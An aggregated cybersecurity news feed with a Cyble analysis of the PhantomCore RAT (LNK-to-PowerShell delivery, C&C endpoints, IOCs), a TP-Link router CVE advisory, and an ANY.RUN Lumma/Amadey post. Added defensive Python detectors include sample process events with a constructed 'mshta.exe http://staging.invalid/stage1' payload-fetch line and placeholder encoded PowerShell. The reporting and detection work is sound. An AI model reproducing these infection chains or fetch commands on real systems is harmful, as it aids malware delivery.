Astrix Security Banks $45M Series B to Secure Non-Human Identities

Tel Aviv company building software to secure non-human identities banks a $45 million funding round led by Menlo Ventures.

The post Astrix Security Banks $45M Series B to Secure Non-Human Identities appeared first on SecurityWeek.

Security Risks in TP-Link Archer Router Could Lead to Unauthorized Access

Overview

The TP-Link Archer C50 V4, a popular dual-band wireless router designed for small office and home office (SOHO) networks, has been found to contain multiple security vulnerabilities that could expose users to a range of cyber threats.

These TP-Link Archer router vulnerabilities, tracked as CVE-2024-54126 and CVE-2024-54127, affect all firmware versions prior to Archer C50(EU)_V4_240917. The Indian Computer Emergency Response Team (CERT-In) flagged these vulnerabilities in TP-Link Archer routers.

The vulnerabilities identified in the TP-Link Archer C50 V4 wireless router could allow attackers to exploit critical security holes in the device, leading to unauthorized access and potentially damaging consequences. Two specific issues have been highlighted: a flaw in the firmware upgrade process and the exposure of sensitive Wi-Fi credentials.

Details of the TP-Link Archer Router Vulnerabilities

The TP-Link Archer router vulnerabilities have been classified as medium risk. While the immediate impact may not be critical, the potential for exploitation remains a threat to network security. CVE-2024-54126 and CVE-2024-54127 were reported by Khalid Markar, Amey Chavekar, Sushant Mane, and Dr. Faruk Kazi from CoE-CNDS Lab, VJTI, Mumbai.

Vulnerability Details in TP-Link Archer Router

  1. Insufficient Integrity Verification During Firmware Upgrade (CVE-2024-54126)

One of the key vulnerabilities in the TP-Link Archer C50 router arises from an improper signature verification mechanism in the firmware upgrade process. This issue is present in the web interface of the router, which could be exploited by an attacker with administrative privileges. If the attacker is within the Wi-Fi range of the router, they could upload and execute malicious firmware, allowing them to compromise the device completely.

The absence of adequate integrity checks during firmware updates could enable an attacker to introduce backdoors or malicious code into the router. This would allow the attacker to control the device, manipulate network traffic, or even hijack the entire system, posing a serious security risk for users relying on this router for their home or business networks.

  2. Exposure of Wi-Fi Credentials in Plaintext (CVE-2024-54127)

The second vulnerability is related to the lack of proper access control on the serial interface of the TP-Link Archer C50 router. An attacker with physical access to the device could exploit this weakness by accessing the Universal Asynchronous Receiver-Transmitter (UART) shell. Once inside, the attacker could easily extract Wi-Fi credentials, including the network name (SSID) and password, which would give them unauthorized access to the targeted network.

This vulnerability in TP-Link Archer routers is particularly serious because obtaining Wi-Fi credentials allows attackers to infiltrate the network, potentially exposing sensitive data, intercepting communications, or launching further attacks on connected devices. Because the credentials can be obtained without any remote access, the flaw is especially dangerous wherever physical access to the device is possible.

Impact of the TP-Link Archer Vulnerability

The presence of these vulnerabilities in the TP-Link Archer C50 V4 router could lead to significant security risks, including:

  • Compromise of the router: Malicious firmware uploads could enable attackers to control the device, potentially disrupting network operations or using it as a platform for launching further attacks.
  • Exposure of sensitive information: The vulnerability related to the exposure of Wi-Fi credentials allows attackers to access the network and all connected devices. This could lead to data breaches, unauthorized surveillance, and even identity theft.
  • Potential system compromise: Once the attacker gains access to the router or the Wi-Fi network, they may leverage this foothold to exploit other vulnerabilities in the network infrastructure, leading to a larger-scale attack.

Given that many home and small office networks rely on TP-Link Archer routers for wireless connectivity, these vulnerabilities have the potential to affect a large number of users. The impact could be particularly severe for businesses or individuals who store sensitive information or rely on secure communications.

Mitigating the Vulnerability in TP-Link Archer Router

To mitigate the risks associated with these vulnerabilities, TP-Link has released a firmware update designed to address the issues. The solution is available for download through the official TP-Link website and should be applied as soon as possible to protect the router from potential attacks. Some of the recommended actions include:

  • Update Firmware: Users of the TP-Link Archer C50 V4 router are advised to upgrade to the latest firmware version, Archer C50(EU)_V4_240917. This update fixes the vulnerabilities by enhancing the integrity checks during the firmware upgrade process and securing access to the serial interface to prevent unauthorized access to Wi-Fi credentials.
  • Firmware Upgrade Instructions: To ensure a smooth upgrade, users should follow the specific instructions provided by TP-Link, which include verifying the hardware version of the router, downloading the correct firmware, and ensuring the router is not powered off during the upgrade process. It is also recommended to use a wired connection during the upgrade to avoid any issues with wireless disconnections.

Conclusion

The discovery of vulnerabilities in the TP-Link Archer router highlights the critical need for users to stay updated with the latest firmware releases and security patches. The vulnerabilities in the TP-Link Archer C50 V4, including the insufficient integrity verification during firmware upgrades and the exposure of Wi-Fi credentials, present ongoing security risks that could lead to unauthorized access and system compromise.

By upgrading to the latest firmware version, users can mitigate the risks associated with these vulnerabilities and protect their networks from potential exploitation. TP-Link Archer router users should take immediate action to secure their devices and ensure their networks remain safe from attackers seeking to exploit these flaws.

The post Security Risks in TP-Link Archer Router Could Lead to Unauthorized Access appeared first on Cyble.

Head Mare Group Intensifies Attacks on Russia with PhantomCore RAT

Key takeaways

  • Cyble Research and Intelligence Labs (CRIL) has identified a campaign associated with the infamous group Head Mare aimed at targeting Russians.
  • This campaign involves a ZIP archive containing both a malicious LNK file and an executable. The executable is cleverly disguised as an archive file to deceive users and facilitate its malicious operations.
  • The LNK file contains commands designed to extract and execute the disguised executable, which has been identified as PhantomCore.
  • PhantomCore is a Remote Access Trojan (RAT) utilized by the hacktivist group Head Mare. It has been active since 2023 and is known for consistently targeting Russia.  
  • In previous attacks, GoLang-compiled PhantomCore binaries were used. However, in this campaign, the threat actor (TA) is using C++-compiled PhantomCore binaries instead.
  • TA also integrated the Boost.Beast library into PhantomCore to enable communication with the command-and-control (C&C) server.
  • PhantomCore collects the victim’s information, including the public IP address, to gain detailed insights into the target before deploying the final-stage payload or executing additional commands on the compromised system.
  • PhantomCore RAT is known to deploy ransomware payloads such as LockBit and Babuk, inflicting significant damage on the victim’s systems.

Overview

On 2nd September 2024, Kaspersky released a blog about the Head Mare group, which first emerged in 2023. Head Mare is a hacktivist group targeting organizations in Russia and Belarus with the goal of causing maximum damage rather than financial gain. They use up-to-date tactics, such as exploiting the CVE-2023-38831 vulnerability in WinRAR, to gain initial access and deliver malicious payloads. The group maintains a public presence on X, where they disclose information about their victims.

Their targets span various industries, including government, transportation, energy, manufacturing, and entertainment. Unlike other groups, Head Mare also demands ransom for data decryption.

Figure 1 – Threat Actor profile

CRIL recently identified a campaign targeting Russians linked to the notorious Head Mare group. While the initial infection vector remains unknown, the group typically reaches users via spam emails. In this campaign, a ZIP archive named “Doc.Zip” was discovered, containing a malicious LNK file, an executable disguised as “Doc.zip” identified as the PhantomCore RAT, and a corrupted PDF.

Upon executing the LNK file, it extracts the “Doc.Zip” archive into the “C:\ProgramData” directory and executes the file “Doc.zip” using cmd.exe. Once executed, the malware gathers the victim’s information, such as the public IP address, Windows version, username, etc., and sends it to a command-and-control (C&C) server controlled by the TA. It then awaits further commands from the C&C server to execute additional malicious activities. The figure below shows the infection chain.

Figure 2 – Infection chain

Earlier, PhantomCore samples were developed using GoLang. However, in the latest campaign, the threat actor is using C++-compiled PhantomCore binaries. Additionally, the C++ version of PhantomCore incorporates the Boost.Beast library, which facilitates communication between the infected system and the command-and-control (C&C) server through HTTP WebSockets.

Technical Analysis

The ZIP archive “Doc.zip,” downloaded from the file-sharing website hxxps://filetransfer[.]io/data-package/AiveGg6u/download, is suspected to have been delivered to the victim via a spam email. The email likely carried a social engineering theme, designed to appear legitimate, such as an invoice for goods or similar financial documents. This theme was intended to deceive the recipient into interacting with the malicious attachment, ultimately leading to the delivery of the malicious payload.

The zip archive contains multiple files, including two LNK files, a corrupted lure PDF file, and an executable camouflaged as a “.zip” file extension. All the files within the archive are notably in Russian, as detailed in the table below.

| Actual file name | Translated name |
|---|---|
| Список товаров и услуг.pdf.lnk | List of goods and services.pdf.lnk |
| Счет-фактура.pdf.lnk | Invoice.pdf.lnk |
| Контактные данные для оплаты.pdf | Contact details for payment.pdf |
| Doc.zip | Doc.zip |

The LNK file is configured to execute a PowerShell command that locates and extracts the “Doc.zip” archive into the “C:\ProgramData” directory. Once extracted, the “Doc.zip” archive, which contains an executable, is launched using the cmd.exe start command. The figure below illustrates the contents of the LNK file.
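The two tricks in this archive, an executable carrying a .zip name and a shortcut hiding behind a .pdf.lnk double extension, are both visible without executing anything: the first bytes of each file contradict what the name claims. The Python below is an added example, not code from the Cyble analysis or from the sample; it compares the type implied by each file name with the file's magic bytes. The archive entries are constructed stand-ins that only mimic the layout described above, and the table of magic values and "document-like" inner extensions is an assumption.

```python
"""Flag archive entries whose name claims one file type but whose bytes say another."""
from __future__ import annotations

# Leading magic bytes for the file types seen in the archive (assumed table).
MAGIC = {
    "pe": b"MZ",
    "zip": b"PK\x03\x04",
    "pdf": b"%PDF",
    # Windows shortcut: HeaderSize 0x4C followed by the start of LinkCLSID
    "lnk": b"\x4c\x00\x00\x00\x01\x14\x02\x00",
}

# Extension -> type the file name claims.
CLAIMED = {".zip": "zip", ".pdf": "pdf", ".lnk": "lnk", ".exe": "pe"}

# Inner extensions that make a double extension look like a document.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "txt"}

# Full LNK header (HeaderSize + LinkCLSID 00021401-0000-0000-C000-000000000046).
LNK_HEADER = b"\x4c\x00\x00\x00\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"

# Constructed sample entries mimicking the archive layout described above
# (the bytes are synthetic stand-ins, not content from the real samples).
SAMPLE_ARCHIVE = {
    "Список товаров и услуг.pdf.lnk": LNK_HEADER,
    "Контактные данные для оплаты.pdf": b"\x00\x00\x00corrupted lure",
    "Doc.zip": b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56,
    "notes.zip": b"PK\x03\x04\x14\x00" + b"\x00" * 24,  # a genuine archive, for contrast
}


def sniff_type(data: bytes) -> str:
    """Return the type implied by the leading magic bytes, or 'unknown'."""
    for kind, sig in MAGIC.items():
        if data.startswith(sig):
            return kind
    return "unknown"


def claimed_type(name: str) -> str:
    """Return the type implied by the file's final extension, or 'unknown'."""
    lower = name.lower()
    for ext, kind in CLAIMED.items():
        if lower.endswith(ext):
            return kind
    return "unknown"


def double_extension(name: str) -> bool:
    """True for names like 'invoice.pdf.lnk' where a document extension sits before the real one."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DOCUMENT_EXTS


def flag_entries(entries: dict[str, bytes]) -> list[str]:
    """One finding per name/content mismatch and per double extension."""
    findings = []
    for name, data in entries.items():
        claimed, actual = claimed_type(name), sniff_type(data)
        if claimed != actual:
            findings.append(f"{name}: named as {claimed} but content is {actual}")
        if double_extension(name):
            findings.append(f"{name}: double extension hides the real type")
    return findings


if __name__ == "__main__":
    for finding in flag_entries(SAMPLE_ARCHIVE):
        print(finding)
```

On the sample archive this reports the PE disguised as Doc.zip, the PDF that is not a PDF, and the double extension on the shortcut, while the genuine archive passes; in practice the same check runs over the members of an attachment before any of them is opened.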

Figure 3 – Contents of Список товаров и услуг.pdf.lnk

Upon execution, the Doc.zip file sets both the input and output code pages to OEM Russian (Cyrillic) using the SetConsoleCP and SetConsoleOutputCP Win32 APIs. Additionally, it sets the locale language of the victim machine to “ru_RU.UTF-8” to configure the system to use the Russian locale with UTF-8 encoding.

Figure 4 – Sets locale to Russia

After configuring the locale settings, the malware attempts to connect to the C&C server at 45.10.247.152 using the User-Agent string “Boost.Beast/353”. It retries the connection until successful, sleeping for 10 seconds between each attempt.

Figure 5 – Connect request

After a successful connection is established, the malware gathers the victim’s information, including the Buildname, Windows version, public IP address, computer name, username, and domain details. The Buildname, which can vary (e.g., ZIP, URL), may indicate the infection vector. This collected data is then sent to the C&C server via the “init” endpoint, as illustrated in the figure below.

Figure 6 – Gathering victim’s information

Figure 7 – Sending victim’s details

After sending the initial request containing the victim details and UUID, the malware waits for a response from the TA. However, during our analysis, we were unable to capture the response. Nevertheless, code analysis indicates that the typical response from the TA follows a format similar to the one shown below.

Figure 8 – TA’s response

Moreover, the TA can execute commands on the victim’s machine and download additional payloads from the C&C server. This enables them to escalate the compromise, conduct further malicious activities, or expand the attack by deploying specific commands and payloads. The RAT uses the following endpoints for its C&C communication and to receive commands:

  • hxxp:// [C&C IP Address]/connect
  • hxxp:// [C&C IP Address]/init
  • hxxp:// [C&C IP Address]/check
  • hxxp:// [C&C IP Address]/command
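The user agent string, the fixed 10-second retry loop and the four endpoints above are three independent signals a defender can look for in outbound HTTP telemetry. The Python below, added here as an example and not code from the analysis, scores each client in a proxy log on all three. The log layout, request methods and timestamps are constructed assumptions; the C&C host, the user agent and the endpoint paths are the indicators reported in this post.

```python
"""Score outbound HTTP records for PhantomCore-style C&C behaviour."""
from __future__ import annotations

import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import urlsplit

# Indicators reported in the analysis above.
C2_USER_AGENT = "Boost.Beast/353"
C2_ENDPOINTS = {"/connect", "/init", "/check", "/command"}
RETRY_SECONDS = 10     # the sample sleeps 10 s between connection attempts
RETRY_TOLERANCE = 2    # seconds of jitter tolerated around that interval

# Assumed log layout: timestamp client method url "user-agent", one request per line.
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "([^"]*)"$')

# Constructed sample proxy log. Methods and timings are assumptions; the host and
# paths are the C&C indicators from this post. 10.0.0.9 is benign traffic that
# happens to touch two similarly named paths on an unrelated site.
SAMPLE_LOG = """\
2024-12-09T10:00:00 10.0.0.7 POST http://45.10.247.152/connect "Boost.Beast/353"
2024-12-09T10:00:10 10.0.0.7 POST http://45.10.247.152/connect "Boost.Beast/353"
2024-12-09T10:00:20 10.0.0.7 POST http://45.10.247.152/connect "Boost.Beast/353"
2024-12-09T10:00:21 10.0.0.7 POST http://45.10.247.152/init "Boost.Beast/353"
2024-12-09T10:00:31 10.0.0.7 GET http://45.10.247.152/check "Boost.Beast/353"
2024-12-09T10:00:41 10.0.0.7 GET http://45.10.247.152/command "Boost.Beast/353"
2024-12-09T10:01:00 10.0.0.9 GET http://example.com/check "Mozilla/5.0"
2024-12-09T10:01:05 10.0.0.9 GET http://example.com/init "Mozilla/5.0"
"""


def parse_log(text: str) -> list[dict]:
    """Parse the assumed one-request-per-line layout into records; skip lines that do not fit."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, client, method, url, ua = m.groups()
        parts = urlsplit(url)
        records.append({
            "ts": datetime.fromisoformat(ts),
            "client": client,
            "method": method,
            "host": parts.netloc,
            "path": parts.path,
            "ua": ua,
        })
    return records


def is_retry_loop(stamps: list[datetime], min_repeats: int = 3) -> bool:
    """True when at least min_repeats requests arrive spaced RETRY_SECONDS apart in a row."""
    stamps = sorted(stamps)
    run = 1
    for earlier, later in zip(stamps, stamps[1:]):
        gap = (later - earlier).total_seconds()
        if abs(gap - RETRY_SECONDS) <= RETRY_TOLERANCE:
            run += 1
            if run >= min_repeats:
                return True
        else:
            run = 1
    return False


def score_clients(records: list[dict]) -> dict[str, list[str]]:
    """Map each client to the list of C&C signals it triggered (clients with none are omitted)."""
    ua_hits = set()
    endpoints = defaultdict(set)    # (client, host) -> C&C paths seen
    timeline = defaultdict(list)    # (client, host, path) -> request timestamps
    for r in records:
        if r["ua"] == C2_USER_AGENT:
            ua_hits.add(r["client"])
        if r["path"] in C2_ENDPOINTS:
            endpoints[(r["client"], r["host"])].add(r["path"])
        timeline[(r["client"], r["host"], r["path"])].append(r["ts"])

    findings = defaultdict(list)
    for client in sorted(ua_hits):
        findings[client].append(f"user agent {C2_USER_AGENT!r} (PhantomCore C&C client)")
    for (client, host), paths in endpoints.items():
        # Three of the four endpoints on one host is the threshold used here (assumption).
        if len(paths) >= 3:
            findings[client].append(f"{len(paths)} of 4 PhantomCore endpoints on {host}: {sorted(paths)}")
    for (client, host, path), stamps in timeline.items():
        if is_retry_loop(stamps):
            findings[client].append(f"fixed {RETRY_SECONDS}s retry loop to {host}{path}")
    return dict(findings)


if __name__ == "__main__":
    for client, reasons in score_clients(parse_log(SAMPLE_LOG)).items():
        print(client)
        for reason in reasons:
            print("  -", reason)
```

The endpoint rule is deliberately keyed on host plus path set rather than the path names alone, which is why the benign client hitting /check and /init on an unrelated site is not reported; swapping the hard-coded IP for the full list in the Indicators of Compromise section turns this into a straightforward hunting query.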

The TA uses the following methods to execute commands and deploy additional payloads.

Command Execution through Pipes

The execution process involves creating a pipe and redirecting the WritePipe handle to the standard output (stdout) and standard error (stderr). A new process is then launched using the command “cmd.exe /c” to execute the specified command. After the command is executed, the output is retrieved by reading from the pipe using the “ReadFile” API and the ReadPipe handle. Additionally, a log is generated to monitor and track the success or failure of the pipe creation and command execution.

The following code demonstrates the TA’s ability to execute commands through a pipe, read the command output, and parse the commands for execution via the pipe.

Figure 9 – PIPE creation

Creating new process

The malware can also create a new process based on the input from the calling function. If successful, it closes the process and thread handles, updates the log with a success message, and sets a flag to notify the calling process. In case of failure, it logs an error message and sets a different flag to indicate the failure.

Figure 10 – New Process Creation

The Head Mare group has been known to deploy ransomware in previous attacks, targeting a variety of systems and environments. This includes the use of widely recognized ransomware strains such as LockBit for Windows machines and Babuk for ESXi (VMware) environments. These ransomware strains are notorious for their ability to encrypt valuable data and demand ransom payments from victims in exchange for decryption keys.

Yara and Sigma rules to detect this campaign are available for download from the linked Github repository.

Conclusion

The Head Mare group’s campaign continues to target Russian organizations using the PhantomCore RAT and evolving tactics, including using C++-compiled binaries and social engineering techniques. The group’s ability to collect victim data and deploy additional payloads, including ransomware, highlights the ongoing threat it poses. Organizations must stay vigilant and strengthen their security measures to defend against such attacks.

Recommendations

  • Avoid opening unexpected or suspicious email attachments, particularly ZIP or LNK files. Train employees to identify phishing attempts and verify file origins before interacting with downloads. Implement email security solutions that detect and block malicious attachments.
  • Ensure all software, including WinRAR and operating systems, is updated with the latest security patches. Vulnerabilities like CVE-2023-38831 can be exploited in outdated software, making patch management critical for prevention.
  • Deploy endpoint detection and response (EDR) tools to monitor suspicious activities such as unauthorized PowerShell execution. Use intrusion detection/prevention systems (IDS/IPS) to block connections to known malicious C&C servers like the one observed in this attack.
  • Limit user permissions to execute potentially dangerous commands or files. Use application whitelisting to allow only trusted programs to run and disable unnecessary scripting tools like PowerShell on non-administrative systems.
  • Continuously monitor network traffic for anomalies, such as unusual locale settings or repeated connection attempts to unknown IP addresses. Create an incident response plan to quickly isolate and remediate affected systems in case of compromise.

MITRE ATT&CK® Techniques

| Tactic | Technique | Procedure |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566) | ZIP archives might be sent through phishing email to the target users |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | PowerShell is used to extract the archive file |
| Execution (TA0002) | Windows Command Shell (T1059.003) | Cmd.exe is used to execute commands through PIPE, start command |
| Execution (TA0002) | Native API (T1106) | SetConsoleCP, SetConsoleOutputCP, and other Win32 APIs to configure locale |
| Command and Control (TA0011) | System Information Discovery (T1082) | Collects victim details, including OS version, computer name, username, and domain details |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Communicates with the C&C server over HTTP using the “Boost.Beast” library. |

Indicators of Compromise

| Indicator | Indicator type | Comments |
|---|---|---|
| 6ac2d57d066ef791b906c3b4c6b5e5c54081d6657af459115eb6abb1a9d1085d | SHA-256 | coYLaSU4TQum |
| 0f578e437f5c09fb81059f4b5e6ee0b93cfc0cdf8b31a29abc8396b6137d10c3 | SHA-256 | Список товаров и услуг.pdf.lnk |
| dd49fd0e614ac3f6f89bae7b7a6aa9cdab3b338d2a8d11a11a774ecc9d287d6f | SHA-256 | Счет-фактура.pdf.lnk |
| 57848d222cfbf05309d7684123128f9a2bffd173f48aa3217590f79612f4c773 | SHA-256 | Doc.zip |
| 4b62da75898d1f685b675e7cbaec24472eb7162474d2fd66f3678fb86322ef0a | SHA-256 | Phantomcore RAT |
| 44b1f97e1bbdd56afeb1efd477aa4e0ecaa79645032e44c7783f997f377d749f | SHA-256 | Phantomcore RAT |
| 2dccb526de9a17a07e39bdedc54fbd66288277f05fb45c7cba56f88df00e86a7 | SHA-256 | Phantomcore RAT |
| 1a2d1654d8ff10f200c47015d96d2fcb1d4d40ee027beb55bb46199c11b810cc | SHA-256 | Phantomcore RAT |
| 8aad7f80f0120d1455320489ff1f807222c02c8703bd46250dd7c3868164ab70 | SHA-256 | Phantomcore RAT |
| 9df6afb2afbd903289f3b4794be4768214c223a3024a90f954ae6d2bb093bea3 | SHA-256 | Phantomcore RAT |
| hxxps://city-tuning[.]ru/collection/srvhost.exe | URL | Phantomcore RAT Download URL |
| hxxps://filetransfer[.]io/data-package/AiveGg6u/download | URL | ZIP file download URL |
| hxxp://45.10.247[.]152/init | URL | C&C |
| hxxp://45.10.247[.]152/check | URL | C&C |
| hxxp://45.10.247[.]152/connect | URL | C&C |
| hxxp://45.10.247[.]152/command | URL | C&C |
| hxxp://185.80.91[.]84/command | URL | C&C |
| hxxp://185.80.91[.]84/connect | URL | C&C |
| hxxp://185.80.91[.]84/check | URL | C&C |
| hxxp://185.80.91[.]84/init | URL | C&C |
| hxxp://45.87.245[.]53/init | URL | C&C |
| hxxp://45.87.245[.]53/check | URL | C&C |
| hxxp://45.87.245[.]53/connect | URL | C&C |
| hxxp://45.87.245[.]53/command | URL | C&C |

The post Head Mare Group Intensifies Attacks on Russia with PhantomCore RAT appeared first on Cyble.

Hackers are exploiting a flaw in popular file-transfer tools to launch mass hacks, again

Threat actors are exploiting a high-risk bug in Cleo software – and Huntress warns that fully-patched systems are vulnerable

© 2024 TechCrunch. All rights reserved. For personal use only.

Microsoft Rolls Out Default NTLM Relay Attack Mitigations

Microsoft has rolled out new default security protections that mitigate NTLM relaying attacks across on-premises Exchange, AD CS, and LDAP services.

The post Microsoft Rolls Out Default NTLM Relay Attack Mitigations appeared first on SecurityWeek.

Manufacturing Companies Targeted with New Lumma and Amadey Campaign

The manufacturing industry has long been a target of cybercriminals. While data encryption has been a prevalent tactic in recent years, threat actors are now increasingly focusing on stealing sensitive information and gaining control over critical infrastructure.  

One of the latest campaigns on record involves the use of Lumma and Amadey malware. 

Campaign Uses Fake LogicalDOC URLs  

This campaign heavily leverages Living Off the Land (LOLBAS) techniques to deliver malware as part of its operations. 

Threat actors distribute phishing emails with URLs leading targets to download LNK files disguised as PDFs. These files are accessed via a domain name masquerading as one belonging to LogicalDOC, a service for managing documentation widely utilized in the manufacturing industry.  

Attack Involves Scripts to Aid Infection  

The malicious LNK file, once activated, initiates PowerShell via an ssh.exe command. Following a chain of scripts, a CPL file is downloaded from berb[.]fitnessclub-filmfanatics[.]com as a ZIP archive.  

The malware utilizes both PowerShell and Windows Management Instrumentation (WMI) commands to collect detailed information about the victim’s system. This includes:  

  • Data such as language settings 
  • Antivirus software 
  • Operating system versions 
  • Hardware specifications 

This reconnaissance allows attackers to tailor subsequent attacks and enhances their credibility when sending follow-up malicious emails within the targeted organization. 

DLL Sideloading Ensures Evasion  

Attackers run malicious code in memory without leaving traces and abuse standard Windows tools to blend in with regular system activities. The downloaded ZIP file contains several malicious files used to carry out DLL sideloading.  

Key Objective

The primary purpose of this attack is to:

  • Steal important information with Lumma Stealer
  • Maintain control over the infected systems with Amadey Bot

Attackers gain the ability to continuously monitor and manipulate their targets, which poses a significant threat to manufacturing businesses.

Why Businesses Need to Pay Attention 

For manufacturing companies, the consequences of such attacks can be severe and include:  

  • Theft of intellectual property 
  • Disruption of operations 
  • Financial losses and compliance violations 

Understanding and preparing for these threats is crucial for protecting valuable assets, maintaining operational integrity, and ensuring the safety of employees and customers. 

Analysis of the Attack with ANY.RUN Sandbox

To proactively identify malicious files belonging to this and other malware attacks, analyze them in the safe environment of ANY.RUN’s Interactive Sandbox that offers: 

  • Real-time Insights: In-depth view of malicious activities as they occur. 
  • Interactivity: Test threat responses in a live system. 
  • Comprehensive Reporting: Detailed reports on IOCs, malware families, and more. 
Analysis of a malicious LNK file inside ANY.RUN’s Sandbox

By uploading a malicious LNK file to the sandbox and executing it we can observe how the entire chain of infection plays out. 

ANY.RUN detects activities related to malicious and suspicious process

First, the .lnk file initiates SSH, which starts PowerShell. 

Mshta is utilized to download a payload from remote server

PowerShell then launches Mshta with the AES-encrypted first-stage payload that it decrypts and executes. 

Attack uses Emmenhtal loader to facilitate infection

PowerShell executes an AES-encrypted command to decrypt and run Emmenhtal

Suricata IDS is used in ANY.RUN to identify Amadey-related traffic

Emmenhtal then infects the system with Lumma and Amadey.
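Both the Head Mare chain described earlier on this page (LNK, then PowerShell extracting into C:\ProgramData, then cmd.exe starting a file named Doc.zip) and the chain here (LNK, then ssh.exe, then PowerShell, then Mshta) show up in process-creation telemetry as parent/child pairs that normal user activity does not produce. The Python below is an added example, not code from Cyble or ANY.RUN; the events are constructed in a simplified Sysmon-style layout, every command line is a placeholder rather than the real one, and the rule table is an assumption chosen to show the detection logic, not a complete rule set.

```python
"""Flag parent/child process pairs typical of LNK-driven loader chains."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 fields, simplified)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Parent images that should not normally spawn the given child (assumed rule set).
SUSPICIOUS_PARENTS = {
    "powershell.exe": {"ssh.exe"},       # ssh.exe abused as a LOLBAS launcher
    "mshta.exe": {"powershell.exe"},     # script host started from PowerShell
}
PROGRAMDATA = re.compile(r"c:\\programdata", re.IGNORECASE)
# cmd.exe "start" of an archive-named file dropped under C:\ProgramData.
START_ARCHIVE = re.compile(r"\bstart\b.*c:\\programdata\\[^\s\"]+\.zip", re.IGNORECASE)

# Constructed sample events; command lines are placeholders, not those of the campaigns.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\OpenSSH\ssh.exe",
              "ssh.exe <constructed arguments that start PowerShell>"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc <constructed>"),
    ProcEvent(400, 300, r"C:\Windows\System32\mshta.exe",
              "mshta.exe http://staging.invalid/stage1"),
    ProcEvent(500, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -c Expand-Archive .\Doc.zip -DestinationPath C:\ProgramData"),
    ProcEvent(600, 500, r"C:\Windows\System32\cmd.exe",
              r'cmd.exe /c start "" C:\ProgramData\Doc.zip'),
    ProcEvent(700, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),  # benign
]


def image_name(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def find_suspicious_chains(events: list[ProcEvent]) -> list[str]:
    """Return one finding per event that matches a parent/child or command-line rule."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        child = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else "<unknown>"
        if parent_name in SUSPICIOUS_PARENTS.get(child, set()):
            findings.append(f"pid {e.pid}: {parent_name} -> {child}")
        if child == "cmd.exe" and START_ARCHIVE.search(e.cmdline):
            findings.append(f"pid {e.pid}: cmd.exe start of archive-named file under C:\\ProgramData")
        if child == "powershell.exe" and PROGRAMDATA.search(e.cmdline) and ".zip" in e.cmdline.lower():
            findings.append(f"pid {e.pid}: PowerShell handling a .zip under C:\\ProgramData")
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_chains(SAMPLE_EVENTS):
        print(finding)
```

The parent/child lookup is what makes the ssh.exe and Mshta stages visible, since each binary on its own is a legitimate Windows component; the command-line rules catch the Head Mare drop-and-start pattern even when the parent is an ordinary explorer.exe, while the plain `cmd.exe /c dir` event is left alone.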

Collect Threat Intelligence on Lumma and Amadey Attacks 

With TI Lookup, ANY.RUN’s searchable database of the latest threat intelligence, you can find more info on malware and phishing campaigns. TI Lookup provides: 

  • Fresh Data: Latest samples from a global network of security professionals. 
  • Actionable Indicators: IOCs from traffic, memory dumps, and manual collection. 
  • Contextual Information: Links to full sandbox analysis sessions with detailed data. 

Use the following query, consisting of the name of the threat and the path to one of the malicious files used in the attack, for your search: 

TI Lookup lets you collect threat data and view relevant sandbox sessions

The service provides a list of files matching the query along with sandbox sessions featuring analysis of samples belonging to the same campaign that you can explore in detail. 

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

The post Manufacturing Companies Targeted with New Lumma and Amadey Campaign appeared first on ANY.RUN’s Cybersecurity Blog.

Ongoing Phishing and Malware Campaigns in December 2024

Cyber attackers never stop inventing new ways to compromise their targets. That’s why organizations must stay updated on the latest threats. 
Here’s a quick rundown of the current malware and phishing attacks you need to know about to safeguard your infrastructure before they reach you.
Zero-day Attack: Corrupted Malicious Files Evade Detection by Most Security Systems 
The analyst

The Hacker News

Sprawling ‘Operation Digital Eye’ Attack Targets European IT Orgs

A Chinese threat actor infiltrated several IT and security companies in a bring-your-own VS code, with an eye to carrying out a supply-chain-based espionage attack.

darkreading

$50 Million Radiant Capital Heist Blamed on North Korean Hackers

Radiant Capital says a North Korean threat actor stole $50 million in assets in a sophisticated October attack.

The post $50 Million Radiant Capital Heist Blamed on North Korean Hackers appeared first on SecurityWeek.

ShinyHunters, Nemesis Linked to Hacks After Leaking Their AWS S3 Bucket

Summary Cybersecurity researchers have identified a large-scale hacking operation linked to notorious ShinyHunters and Nemesis hacking groups. In…

Hackread – Latest Cybersecurity, Tech, Crypto & Hacking News